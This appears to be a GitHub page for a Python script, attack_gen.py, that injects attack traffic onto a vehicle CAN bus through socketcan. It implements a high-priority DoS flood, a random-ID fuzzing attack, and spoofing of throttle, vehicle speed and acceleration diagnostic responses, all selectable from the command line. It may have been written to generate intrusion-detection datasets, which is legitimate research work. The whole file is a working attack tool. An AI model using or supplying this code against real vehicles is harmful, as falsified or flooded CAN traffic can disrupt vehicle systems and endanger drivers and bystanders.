-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathattack_gen.py
More file actions
116 lines (105 loc) · 4.57 KB
/
Copy pathattack_gen.py
File metadata and controls
116 lines (105 loc) · 4.57 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
import time
import can
import random
import sys
bus = can.interface.Bus(interface='socketcan', channel='can0', bitrate=500000)
def send_message(arb_id=0x000, bytes=[0, 0, 0, 0, 0, 0, 0, 0]):
"""Sends a single message."""
with bus:
msg = can.Message(
arbitration_id=arb_id, data=bytes, is_extended_id=False
)
try:
bus.send(msg)
print(f"Message {hex(msg.arbitration_id)} {msg.data.hex()} sent on {bus.channel_info}")
except can.CanError:
print("Message NOT sent")
def generate_random_bytes():
bytes = []
for i in range(8):
bytes.append(random.randrange(0, 255))
return bytes
def dos_attack(interval=0.0002, duration=5, use_extended_id=False):
"""Sends a strem of high-priority message."""
print("Starting DoS Attack")
for i in range(int(duration / interval)):
msg = can.Message(arbitration_id=0x000, data=[0, 0, 0, 0, 0, 0, 0, 0], is_extended_id=use_extended_id)
task = bus.send_periodic(msg, interval)
assert isinstance(task, can.CyclicSendTaskABC)
time.sleep(interval)
task.stop()
print("Stopped DoS cyclic send")
def fuzzy_attack(interval=0.003, duration=5, use_extended_id=False):
"""Sends stream of random id and payload messages."""
print("Starting Fuzzy Attack")
for i in range(int(duration / interval)):
msg = can.Message(arbitration_id=random.randrange(0, 4095), data=generate_random_bytes(), is_extended_id=use_extended_id)
task = bus.send_periodic(msg, interval)
assert isinstance(task, can.CyclicSendTaskABC)
time.sleep(interval)
task.stop()
print("Stopped Fuzzy attack")
def throt_spoofing(interval=0.01, duration=5, use_extended_id=False):
"""Sends falsified throttle message."""
print("Starting Throttle Spoofing")
for i in range(int(duration / interval)):
msg = can.Message(arbitration_id=0x7E2, data=[00, 65, 17, 00, 00, 00, 00, 00], is_extended_id=use_extended_id)
task = bus.send_periodic(msg, interval)
assert isinstance(task, can.CyclicSendTaskABC)
time.sleep(interval)
task.stop()
print("Stopped Throttle Spoofing")
def speed_spoofing(interval=0.01, duration=5, use_extended_id=False):
"""Sends falsified throttle message."""
print("Starting Vehicle Speed Spoofing")
for i in range(int(duration / interval)):
msg = can.Message(arbitration_id=0x7E2, data=[00, 65, 13, 00, 00, 00, 00, 00], is_extended_id=use_extended_id)
task = bus.send_periodic(msg, interval)
assert isinstance(task, can.CyclicSendTaskABC)
time.sleep(interval)
task.stop()
print("Stopped Vehicle Speed Spoofing")
def acelleration_spoofing(interval=0.01, duration=5, use_extended_id=False):
"""Sends falsified acelleration response message."""
print("Starting Acceleration Spoofing")
for i in range(int(duration / interval)):
msg = can.Message(arbitration_id=0x7E0, data=[00, 65, 73, 00, 00, 00, 00, 00], is_extended_id=use_extended_id)
task = bus.send_periodic(msg, interval)
assert isinstance(task, can.CyclicSendTaskABC)
time.sleep(interval)
task.stop()
print("Stopped Acceleration Spoofing")
if __name__ == "__main__":
command = sys.argv[1]
if command == "serial_attack":
use_extended_id = (len(sys.argv) > 2) and (sys.argv[2] == "dataset_gen")
dos_attack(use_extended_id=use_extended_id)
fuzzy_attack(use_extended_id=use_extended_id)
throt_spoofing(use_extended_id=use_extended_id)
speed_spoofing(use_extended_id=use_extended_id)
acelleration_spoofing(use_extended_id=use_extended_id)
elif len(sys.argv) > 3:
duration = int(sys.argv[2])
interval = float(sys.argv[3])
if (command == "dos"):
dos_attack(duration=duration, interval=interval)
elif (command == "fuzzy"):
fuzzy_attack(duration=duration, interval=interval)
elif (command == "throt"):
throt_spoofing(duration=duration, interval=interval)
elif (command == "speed"):
speed_spoofing(duration=duration, interval=interval)
elif (command == "accel"):
acelleration_spoofing(duration=duration, interval=interval)
else:
if (command == "dos"):
dos_attack()
elif (command == "fuzzy"):
fuzzy_attack()
elif (command == "throt"):
throt_spoofing()
elif (command == "speed"):
speed_spoofing()
elif (command == "accel"):
acelleration_spoofing()
bus.shutdown()